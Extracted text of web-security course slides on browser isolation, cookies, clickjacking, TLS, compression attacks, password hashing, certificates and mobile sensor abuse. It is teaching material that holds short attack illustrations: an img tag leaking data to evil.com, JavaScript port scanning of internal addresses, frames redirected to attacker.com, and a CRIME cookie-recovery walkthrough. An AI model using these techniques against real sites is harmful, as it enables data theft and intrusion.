SlideShare a Scribd company logo

XCS110_All_Slides.pdf

S
ssuser01066a

This document provides an introduction to web security and the browser security model. It discusses goals of web security including safely browsing the web and supporting secure web applications. It outlines common web threat models and covers topics like HTTP, rendering content, isolation using frames and same-origin policy, communication between frames, frame navigation policies, client state using cookies, and clickjacking. The document aims to provide background knowledge on how the web and browsers work from a security perspective.

Technology
1 of 127
Download to read offline
John Mitchell Dan Boneh INTRODUCTION TO WEB SECURITY
HTTP Rendering the Content Isolation Navigation Communication Client State Click-Jacking Frame Busting MODULE 2
Introduction Module 2: Web Background and the Browser Security Model
Reported Web Vulnerabilities "In the Wild" Data from aggregator and validator of NVD-reported vulnerabilities
Web vs System vulnerabilities Decline in % web vulnerabilities since 2009 § 49% in 2010 -> 37% in 2011. § Big decline in SQL Injection vulnerabilities XSS peak
Web application vulnerabilities 49% 51% Web Application Vulnerabilities as a Percentage of All Disclosures in 2010 Web Applications (49%) Others (51%) 37% 63% Web Application Vulnerabilities as a Percentage of All Disclosures in 2011 H1 Web Applications (49%) Others (51%)
Web Security Challenge Bad Server Good server User How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.) ? Network Enter password? Can also operate as client to other servers Browser
Goals of web security Safely browse the web § Users should be able to visit a variety of web sites, without incurring harm: › No stolen information (without user’s permission) › Site A cannot compromise session at Site B Support secure web applications § Applications delivered over the web should have the same security properties we require for stand-alone applications And § Since many mobile apps are interfaces to web sites, § Support security for mobile apps.
Web Threat Models Web attacker § Control attacker.com § Can obtain SSL/TLS certificate for attacker.com § User visits attacker.com › Or: runs attacker’s Facebook app Network attacker § Passive: Wireless eavesdropper § Active: Evil router, DNS poisoning Malware attacker § Attacker escapes browser isolation mechanisms and run separately under control of OS
Outline § Web security goals and threat models § HTTP § Rendering: Html, DOM, embedded content, JavaScript § Isolation: frames, same-origin policy, HTML5 sandboxing § Communication: fragment, post-message, cross-origin request § Frame navigation: Same-origin policy, descendant policy § Client storage: Cookies, Local storage, Native Client § Click-jacking, tap-jacking, frame busting
HTTP Module 2: Web Background and the Browser Security Model
Uniform Resource Locator (URL) Global identifier of network-retrievable content Example: http://stanford.edu:81/class?name=cs155#homework Special characters are encoded as hex: § %0A = newline § %20 or + = space, %2B = + (special exception) Protocol Hostname Port Path Query Fragment
GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats HTTP Request Method File HTTP version Headers Data – none for GET Blank line GET : no side effect POST : possible side effect
HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> HTTP Response HTTP version Status code Reason phrase Headers Data Cookies
Rendering Content Module 2: Web Background and the Browser Security Model
Rendering content
Browser execution model Each browser window or frame § Loads content § Renders it › Processes HTML and scripts to display page › May involve images, subframes, etc. § Responds to events Events can be § User actions: OnClick, OnMouseover § Rendering: OnLoad, OnBeforeUnload § Timing: setTimeout(), clearTimeout()
<head> <title>Washington Post: Breaking News, World, US, DC News .. Analysis</title> ... </head> <body class="eidos homepage sectionfront"> <script type="text/javascript"> if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito r')){top.location=self.location;} </script> ... <h2 class="headline"><a href="/world/national-security/nsa-gathered- thousands-of-americans-e-mails-before-court-struck-down- program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html"> Secret court: <br>NSA gathered thousands of domestic e-mails</a> ... <p class="byline">Ellen Nakashima&#32…</p> <p class=""> The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p> ... <div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1 ;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline- block; "></div> ... Share this video: ... <a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/ sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on- the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941- 6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')"> ...
Document Object Model (DOM) Object-oriented interface used to read and write docs § web page in HTML is structured data § DOM provides representation of this hierarchy Examples § Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] § Methods: document.write(document.referrer) Includes Browser Object Model (BOM) § window, document, frames[], history, location, navigator (type and version of browser)
Changing HTML using Script, DOM Some possibilities § createElement(elementName) § createTextNode(text) § appendChild(newChild) § removeChild(node) Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) <ul id="t1"> <li> Item 1 </li> </ul> HTML
HTML Image Tags Displays this nice picture è Security issues? <html> … <p> … </p> … <img src=“http://example.com/sunset.gif” height="50" width="100"> … </html> Basic web functionality
Image tag security issues Communicate with other sites § <img src=“http://evil.com/pass-local-information.jpg?extra_information”> Hide resulting image § <img src=“ … ” height=“1" width=“1"> Spoof other sites § Add logos that fool a user Important Point: A web page can send information to any site Security consequences
JavaScript onError Basic function § Triggered when error occurs loading a document or an image Example § Runs onError handler if image does not exist and cannot load <img src="image.gif" onerror="alert('The image could not be loaded.')“ > http://www.w3schools.com/jsref/jsref_onError.asp Basic web functionality
JavaScript timing Sample code § When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. <html><body><img id="test" style="display: none"> <script> var test = document.getElementById(’test’); var start = new Date(); test.onerror = function() { var end = new Date(); alert("Total time: " + (end - start)); } test.src = "http://www.example.com/page.html"; </script> </body></html> Basic web functionality
Port scanning behind firewall JavaScript can: § Request images from internal IP addresses › Example: <img src=“192.168.0.4:8080”/> § Use timeout/onError to determine success/failure § Fingerprint webapps using known image names Server Malicious Web page Firewall 1) “show me dancing pigs!” 2) “check this out” Browser scan scan scan 3) port scan results Basic web functionality
Remote scripting Goal § Exchange data between a client-side app running in a browser and server-side app, without reloading page Methods § Java Applet/ActiveX control/Flash › Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers) § XML-RPC › open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. § Simple HTTP via a hidden IFRAME › IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options See: http://developer.apple.com/internet/webcontent/iframe.html Important Point: A web can maintain bi-directional communication with browser (until user closes/quits)
Simple remote scripting example <script type="text/javascript"> function handleResponse() { alert('this function is called from server.html') } </script> <iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html"> </iframe> <a href="server.html" target="RSIFrame">make RPC call</a> <script type="text/javascript"> window.parent.handleResponse() </script> server.html: another page on same server, could be server.php, etc client.html: RPC by passing arguments to server.html in query string RPC can be done silently in JavaScript, passing and receiving arguments
Isolation Module 2: Web Background and the Browser Security Model
Frame and iFrame Window may contain frames from different sources § Frame: rigid division as part of frameset § iFrame: floating inline frame iFrame example Why use frames? § Delegate screen area to content from another source § Browser provides isolation based on frames § Parent may work even if frame is broken <iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
Windows Interact 32
Analogy Operating system Primitives § System calls § Processes § Disk Principals: Users § Discretionary access control Vulnerabilities § Buffer overflow § Root exploit Web browser Primitives § Document object model § Frames § Cookies / localStorage Principals: “Origins” § Mandatory access control Vulnerabilities § Cross-site scripting § Cross-site request forgery § Cache history attacks § …
Browser security mechanism Each frame of a page has an origin § Origin = protocol://host:port Frame can access its own origin § Network access, Read/write DOM, Storage (cookies) Frame cannot access data associated with a different origin A A B B A
Components of browser security policy Frame-Frame relationships § canScript(A,B) › Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B? § canNavigate(A,B) › Can Frame A change the origin of content for Frame B? Frame-principal relationships § readCookie(A,S), writeCookie(A,S) › Can Frame A read/write cookies from site S?
Library import excluded from SOP <script src=https://seal.verisign.com/getseal? host_name=a.com></script> •Script has privileges of imported page, NOT source server. •Can script other pages in this origin, load more scripts •Same issues with other forms of importing VeriSign
Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com
Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com www.facebook.com www.facebook.com chat.facebook.com chat.facebook.com facebook.com facebook.com
HTML5 Frame sandbox Specify sandbox attribute of iframe <iframe sandbox src="http://untrusted.site.net/content"></iframe> Creates restricted frame § Plugins are disabled. Any kind of ActiveX, Flash, or Silverlight plugin will not be executed. § Forms are disabled. The hosted content is not allowed to post forms back to any target. § Scripts are disabled. JavaScript is disabled and will not execute. § Links to other browsing contexts are disabled. An anchor tag targeting different browser levels will not execute. § Unique origin treatment. All content is treated under a unique origin. The content is not able to traverse the DOM or read cookie information.
Optional attributes relax sandbox allow-forms § Allows embedded page to post back using a form submit within the frame. allow-scripts § Enables JavaScript allow-same-origin § Can access DOM of another frame, subject to same-origin policy § Only useful with allow-scripts § But be careful: parent frame can manipulate sandbox attributes and remove further restrictions. allow-top-navigation § Allow content to navigate entire tab/window allow-popups § Allow embedded content to open new popup windows
Navigation Module 2: Web Background and the Browser Security Model
Guninski Attack awglogin window.open("https://attacker.com/", "awglogin");
What should the policy be? 43 Child Sibling Descendant Frame Bust
Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
Window Policy Anomaly top.frames[1].location = "http://www.attacker.com/..."; top.frames[2].location = "http://www.attacker.com/..."; ...
Browser Policy IE 6 (default) Permissive IE 6 (option) Child IE7 (no Flash) Descendant IE7 (with Flash) Permissive Firefox 2 Window Safari 3 Permissive Opera 9 Window HTML 5 Child Legacy Browser Behavior
Browser Policy IE7 (no Flash) Descendant IE7 (with Flash) Descendant Firefox 3 Descendant Safari 3 Descendant Opera 9 (many policies) HTML 5 Descendant Adoption of Descendent Policy
Communication Module 2: Web Background and the Browser Security Model
Fragment Identifier Messaging Send information by navigating a frame § http://gadget.com/#hello Navigating to fragment doesn’t reload frame § No network traffic, but frame can read its fragment Not a secure channel § Confidentiality § Integrity § Authentication ü û ü
window.postMessage API for inter-frame communication § Supported in current browsers § A network-like channel between frames Add a contact Share contacts
window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); frames[0].postMessage("Attack at dawn!", "http://b.com/"); postMessage syntax Facebook Anecdote Attack at dawn!
frames[0].postMessage("Attack at dawn!"); Why include “targetOrigin”? What goes wrong? Messages sent to frames, not principals § When would this happen? 52
Two-way communication A method call is associated with a response Can build this on top of postMessage § Messenger: Each time you call a method in the iframe, you pass a reply function that is called with the results of that method call.
jQuery postMessage plugin Wraps the postMessage API and simplifies its usage. Works in browsers that do not support postMessage method by using fragment navigation (hash portion of the url)
Network communication Cross-origin network requests Access-Control-Allow-Origin: <list of domains> Access-Control-Allow-Origin: * Site B Site A Site A context Site B context
Client State Module 2: Web Background and the Browser Security Model
Cookies Used to store state on user’s machine Browser Server POST … HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser Server GET … Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state If expires=NULL: this session only
Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NO If YES, restricted.html Check val
Cookie Security Policy Uses: § User authentication § Personalization § User tracking: e.g. Doubleclick (3rd party cookies) Origin is the tuple <domain, path> § Can set cookies valid across a domain suffix § Complicated and implementation-specific rules for selecting cookie values, when many cookies apply
Secure Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; Secure=true • Provides confidentiality against network attacker • Browser will only send cookie back over HTTPS • … but no integrity • Can rewrite secure cookies over HTTP Þ network attacker can rewrite secure cookies Þ can log user into attacker’s account
httpOnly Cookies Browser Server GET … HTTP Header: Set-cookie: NAME=VALUE ; httpOnly • Cookie sent over HTTP(s), but not accessible to scripts • cannot be read via document.cookie • Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs
HTML5 Local Storage Based on named key/value pairs § Store data based on a named key (a string) § Retrieve that data with the same key § Data can be any type supported by JavaScript › Including strings, Booleans, integers, floats › But data is actually stored as a string Need to use functions like parseInt() or parseFloat() to coerce your retrieved data into the expected JavaScript datatype Some browsers also implement Web SQL Database § Other forms of local storage would also be useful
var data = localStorage.getItem(1); localStorage.setItem(1,'This is a sample sentence'); Example Save a sentence in Local Storage : Retrieve it: Local Storage supports length, removeItem() and clear().
Security issues Storage per origin § Origin is: scheme, host, port Could be accessed by user with local access (varies by browser) Can be accessed by JavaScript in page § no httpOnly so vulnerable to XSS attacks XSS attacks can read local storage § Do not store sensitive information XSS attacks can write local storage § Do not trust data read from local storage
Native Client
Sandboxed native code
Sandbox techniques Static analysis § No loads or stores permitted outside the data sandbox › Enforced by operating system protection mechanisms § No unsafe instructions › Examples: syscall, int, and lds. § Control flow integrity › All direct, indirect branches target a safe instruction Dynamic monitoring § Native Client runtime mediates system calls
Click-Jacking Module 2: Web Background and the Browser Security Model
Attacker overlays multiple transparent or opaque frames to trick a user into clicking on a button or link on another page Clicks meant for the visible page are hijacked and routed to another, invisible page Clickjacking slide 69
Clickjacking in the Wild Google search for “clickjacking” returns 342,000 results… this is not a hypothetical threat! Summer 2010: Facebook worm superimposes an invisible iframe over the entire page that links back to the victim's Facebook page § If victim is logged in, automatically recommends link to new friends as soon as the page is clicked on Many clickjacking attacks against Twitter § Users send out tweets against their will slide 70
Tap-jacking
Frame Busting Module 2: Web Background and the Browser Security Model
<iframe name=“myframe” src=“http://www.google.com/”> This text is ignored by most browsers. </iframe> Frames Embed HTML documents in other documents
Frame Busting Goal: prevent web page from loading in a frame § example: opening login page in a frame will display correct passmark image Frame busting: if (top != self) top.location.href = location.href
Better Frame Busting Problem: Javascript OnUnload event Try this instead: <body onUnload="javascript: cause_an_abort;)"> if (top != self) top.location.href = location.href else { … code of page here …}
Summary • Web security goals and threat models • HTTP • Rendering: Html, DOM, embedded content, JavaScript • Isolation: frames, same-origin policy, HTML5 sandboxing • Communication: fragment, post-message, cross- origin request • Frame navigation: Same-origin policy, descendant policy • Client storage: Cookies, Local storage, Native Client • Click-jacking, tap-jacking, frame busting
TLS 1.3 Compression attacks Password Breaches Certificates on the Web Abusing Mobile Sensors MODULE 3
Topics for this section TLS attacks and defenses: Compression attacks: CRIME and BREACH, TLS 1.3 Password breaches and 2nd factor authentication Certificate Authorities: compromises, Lets encrypt, universal TLS New hardware security support: Intel SGX Sensor abuse on mobile phones
TLS 1.3 Module 3: Attacks and Defenses
Review: TLS 1.2 browser server SK client-hello server-hello + server-cert (PK) key exchange (several options) Finished cert client-key-exchange: E(PK, k) rand. k k HTTP data encrypted with KDF(k) most common: server authentication only from CA
Review: TLS record encryption (original design) browser server k k plaintext HTTP data 16KB records plaintext integrity tag (MAC) encrypt k hdr ciphertext encryption method is called MAC-then-encrypt : the reason for many attacks on TLS (BEAST, Lucky13, POODLE, … ) why?
TLS 1.3: a new version of TLS (2017) Record encryption: • mandatory method: AES128-GCM fast on x86 (AES-NI) : Intel Skylake, 0.68 cycles/byte • On weaker processors: CHACHA20_POLY1305 fast in software Both methods provide authenticated encryption
TLS 1.3: a new version of TLS (2017) Session setup: • Forward secrecy required (non-forward secure method is deprecated) • Zero round-trip setup option: client can send encrypted data on first flow (after client-hello) • Server certificate is encrypted (previously, sent in the clear) stronger privacy when server has multiple certificates • Initiate TLS session from a pre-shared secret, if one exists more general than session-resume in TLS 1.2
Compression Attacks Module 3: Attacks and Defenses
Compression and Encryption Strong desire to combine compression and encryption How? Option 1: first encrypt and then compress Does not work … ciphertext looks like a random string
Compression and Encryption Option 2: first compress and then encrypt Used in many Internet protocols (TLS, HTTPS, QUIC, …) POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg Recall in TLS: 16KB records Support for compression before encryption
Trouble … [Kelsey’02] Compress-then-encrypt reveals information: POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg POST /bank.com/buy?id=goog Cookie: uid=JhPL8g69684rksfsdg Second message compresses better than first: network observer can distinguish the two messages!
Even worse: the CRIME attack [RD’2012] POST /bank.com/buy?id=aapl Cookie: uid=JhPL8g69684rksfsdg Host: bank.com Javascript Goal: steal user’s bank cookie Javascript can issue requests to Bank, but cannot read Cookie value (simplified)
Observe ciphertext size POST /bank.com/buy?uid=A11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Even worse: the CRIME attack [RD’2012] (simplified)
Observe ciphertext size POST /bank.com/buy?uid=B11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Even worse: the CRIME attack [RD’2012] (simplified)
POST /bank.com/buy?uid=J11111… Cookie: uid=J hPL8g69684rksfsdg Host: bank.com 16KB Ciphertext size is slightly shorter ⇒ first character of Cookie is “J” Even worse: the CRIME attack [RD’2012] (simplified)
POST /bank.com/buy?uid=Ja1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Observe ciphertext size Even worse: the CRIME attack [RD’2012] (simplified)
POST /bank.com/buy?uid=Jh1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Ciphertext size is slightly shorter ⇒ 2nd character of Cookie is “h” Even worse: the CRIME attack [RD’2012] (simplified)
POST /bank.com/buy?uid=Jh1111… Cookie: uid=Jh PL8g69684rksfsdg Host: bank.com 16KB Recover entire cookie after 256 × (len of Cookie) attempts Takes several seconds (simplified) Even worse: the CRIME attack [RD’2012] (simplified)
What to do? The problem: Observed ciphertext length reveals compression amount ⇒ reveals plaintext info … no good solution Non-defense: add a random length pad to ciphertext First defense: compression disabled in TLS (and others, e.g., SPDY) Problem: compression also done in HTTP layer ⇒ BREACH attack [PHG’13] … much harder to disable HTTP compression in practice
What to do? [PHG’13] Many web sites are impacted … A proposed defense: › Application layer “tags” sensitive data fields in HTTP requests and responses (cookies, PII, etc.) › HTTP-level compression only applied to non-sensitive fields … but not easy to implement
Password Breaches Module 3: Attacks and Defenses
A (small) sample of password breaches 2012: Linked-in: 6 million passwords (hashed, unsalted) 2013: Twitter: 250,000 passwords (hashed, salted) Evernote: 50 million records: usernames, emails, hashed passwords Adobe: 38 million records email addrs., password hints, and encrypted passwords 2015: LastPass: stolen email addr., hashed master passwords (and salts) (server-side compromise)
Weak password choice Users frequently choose weak passwords: (adobe list, 2013) A common occurrence Example: the Rockyou password list, 2009 (6 most common pwds) 123456, 12345, Password, iloveyou, princess, abc123 List of 360,000,000 words covers about 25% of user passwords Password: 123456 123456789 password adobe123 12345678 qwerty 1234567 Fraction of users: 5% 1.1% 0.9% 0.5% 0.5% 0.5% 0.3% Total: 8.8%
How to store passwords First rule of password storage: never store passwords in the clear ! pwA Alice SA H(pwA , SA) Bob SB H(pwB , SB) … … … hash salt id To validate a given password server checks: H(pwA , SA) ≟ StoredHash(Alice) Alice password database
How to hash? Linked-in: SHA-1 hashed (unsalted) passwords ⇒ 6 days, 90% of pwds. recovered by exhaustive search The problem: SHA-1 is too fast … attacker can try all words in dictionary To hash passwords: • Use a keyed hash function (e.g., HMAC) where key stored in HSM • In addition: use a slow, space-hard function
How to hash? PBKDF2, bcrypt: slow hash functions • Slowness by “iterating” a crypto hash function like SHA256 • Parameterized number of iterations (e.g., set for 1000 evals/sec) Problem: custom hardware (e.g., GPU) can evaluate hash function much faster than a commodity CPU ⇒ attacker can do dictionary attack much faster than 1000 evals/sec.
Why is custom hardware faster? only small part of CPU used to hash custom hardware for Bitcoin mining ($1,695) Antminer S7 5.06TH/s Intel Skylake 0 1000 2000 3000 4000 5000 6000 Intel x86 Antminer 93 5060 50x 6 mill 2 mill 4 mill 5 mill 3 mill 1 mill 0
How to hash? Scrypt: a slow hash function AND need lots of memory to evaluate ⇒ custom hardware not much faster than commodity CPU Problem: memory access pattern depends on input password ⇒ local attacker can learn memory access pattern for user’s pwd ⇒ eliminates need for memory in an offline dictionary attack Is there a space-hard function where time is independent of pwd? • Pwd hashing competition (2015): Argon2i (also see Balloon hashing)
Strengthening User Authentication One option: biometrics: Fingerprints, retina, facial recognition, … Benefit: hard to forget Problems: Biometrics are not generally secret Cannot be changed, unlike passwords Þ Should primarily be used as a second factor authentication note: CCC’13
2nd factor OTP authentication Setup: Choose random key k On device and server: sk = (k,0) Identification: user server r0 ¬ HMAC(k,0) (k,0) (k,0) yes iff r = HMAC(k,0) r1 ¬ HMAC(k,1) (k,1) (k,1) often, time-based updates
Google authenticator 6-digit timed one-time passwords (TOTP) [RFC 6238] Wide web-site adoption: Gmail, Dropbox, WordPress, … › Open study: 6.4% Gmail user adoption [EuroSec 2015] To enable TOTP for a user: web site presents QR code with embedded data: otpauth://totp/Example:alice@dropbox.com? secret=JBSWY3DPEHPK3PXP & issuer=Example (Subsequent user logins require user to present TOTP) Danger: password reset upon user lockout
Server compromise exposes secrets March 2011: RSA announced servers attacked, secret keys stolen ⇒ enabled SecurID user impersonation Can we do better? Answer: Yes!
Duo (also FIDO U2F ) Signature-based challenge response: sk Alice pkA Bob pkB … … pub-key id user database login page pwd 2FA challenge: m Response: sign(sk, m) data verify confirm No secrets on server, simple user experience
Certificates on the Web Module 3: Attacks and Defenses
Certificate Issuance Woes Wrong issuance: 2011: Comodo and DigiNotar RAs hacked, issue certs for Gmail, Yahoo! Mail 2013: TurkTrust issued cert. for gmail.com (discovered by pinning) 2014: Indian NIC (intermediate CA trusted by the root CA IndiaCCA) issue certs for Google and Yahoo! domains Result: (1) India CCA revoked NIC’s intermediate certificate (2) Chrome restricts India CCA root to only seven Indian domains 2015: MCS (intermediate CA cert issued by CNNIC) issues certs for Google domains Result: current CNNIC root no longer recognized by Chrome ⇒ enables eavesdropping w/o a warning on user’s session
Man in the middle attack using rogue cert Attacker proxies data between user and bank. Sees all traffic and can modify data at will. bank attacker ClientHello ClientHello BankCert BadguyCert ServerCert (Bank) ServerCert (rogue) GET https://bank.com SSL key exchange SSL key exchange k1 k1 k2 k2 HTTP data enc with k1 HTTP data enc with k2 (cert for Bank by a valid CA)
What to do? (many good ideas) HPKP: HTTP public-key pinning § HTTP header that lets a site declare CAs that can sign its cert Public-Key-Pins: pin- sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; § on subsequent HTTPS, browser rejects certs issued by other CAs § TOFU: Trust on First Use Certificate Transparency (CT): [LL’12] § idea: CA’s must advertise a log of all certs. they issued § Browser will only use a cert if it is on the CT log • Efficient implementation using Merkle hash trees • Companies can scan logs to look for invalid issuance
A new CA: Let’s encrypt (letsencrypt.org) A new open Certificate Authority: free certs • Provisioning via an automated agent running on web server Step 1: install agent on web server Step 2: agent proves domain ownership (e.g. bank.com) by DNS record under bank.com or page at fixed URI at bank.com and send Certificate Signing Request (CSR) to CA Step 3: Let’s encrypt CA checks domain ownership if valid, issue cert and sends cert to agent Step 4: agent installs cert on Web server … done 2016: 800K certs issued
Abusing Mobile Sensors Module 3: Attacks and Defenses
no user permission required Sensors on smart phones Microphone Camera GPS Light sensor Compass MEMS Gyroscope / accelerometer Power meter Barometer Heart rate / oximeter (on smart watches) All have a specific function Can they be abused ??
Example 1: fingerprinting Imperfections in camera sensor can be used to link pictures taken by same phone [LG’06] Accelerometer gives a stable device fingerprint [BBMN’14, DRXCN’14] § App. can tell if it has been previously installed on device app device-id
Example 2: Gyrophone [MBN’14] Phone gyroscope: measures vibrations (used for games) Trouble: › Gyroscope picks up air vibrations (a.k.a speech) › Sample rate (apps.): 200Hz › Machine learning ⇒ can recognize some speech
Example 3: Power usage sensor Modern phones measure power drained from battery Enables apps to optimize power use Repeatedly read: /sys/class/power_supply/battery/voltage_now /sys/class/power_supply/battery/current_now Unrestricted access. Can this be abused?
Example 3: Power usage sensor Can this be abused? [MBSN’15] Observation: power used by radio depends on distance and obstacles to cell tower
So what? Our work: [MBSN’15] power readings + machine learning ⇒ GPS Why? Routes in a city have unique power fingerprints Three goals: 1. identify route car is taking among a known set of routes 2. identify car’s location along a known route 3. identify car’s route based on a database of pre-measured short segments ✓ ✓ ✓
Identify location along known route Main tool: dynamic time warping (DTW) ⇒ Aligns pre-recorded data with current samples
Identify location along known route Main tool: dynamic time warping (DTW) ⇒ Aligns pre-recorded data with current samples
Lessons Sensors can have unintended consequences There is risk in giving apps direct access to sensors Prevention: • Always require permissions to access sensors • Reduce data from sensors to min needed for utility or only provide abstract view of sensor data
Final note: limitations of air gaps A machine holds sensitive date and is isolated from network • If it gets infected, can the malware exfiltrate data? Answer: yes! [Usenix Sec 2015] • Mimic GSM signals using data bus • Use x86 instruction: MOVNTDQ m128, xmm • Effective for 60 feet
XCS110_All_Slides.pdf

Recommended

Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
php
phpphp
php
bhuvana553
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman
 
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
UTD Computer Security Group
 
DODN2009 - Jump Start Silverlight
DODN2009 - Jump Start SilverlightDODN2009 - Jump Start Silverlight
DODN2009 - Jump Start Silverlight
Clint Edmonson
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordel
guest2a1135
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
 

Recommended

Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
php
phpphp
php
bhuvana553
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman
 
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
UTD Computer Security Group
 
DODN2009 - Jump Start Silverlight
DODN2009 - Jump Start SilverlightDODN2009 - Jump Start Silverlight
DODN2009 - Jump Start Silverlight
Clint Edmonson
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordel
guest2a1135
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
Jeremiah Grossman
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
Matt Johansen
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
Association Paris-Web
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
Krishna T
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
Building Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and SalesforceBuilding Social Enterprise with Ruby and Salesforce
Building Social Enterprise with Ruby and Salesforce
Raymond Gao
 
Decoding the Web
Decoding the WebDecoding the Web
Decoding the Web
newcircle
 
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric VanderburgEthical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
Eric Vanderburg
 
Browser security
Browser securityBrowser security
Browser security
Uday Anand
 
21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS21. Application Development and Administration in DBMS
21. Application Development and Administration in DBMS
koolkampus
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
Website designing company in faridabad
Website designing company in faridabadWebsite designing company in faridabad
Website designing company in faridabad
Css Founder
 
Cos 432 web_security
Cos 432 web_securityCos 432 web_security
Cos 432 web_security
Michael Freyberger
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
msobiegraj
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Application Security
Application SecurityApplication Security
Application Security
nirola
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
Jeremiah Grossman
 
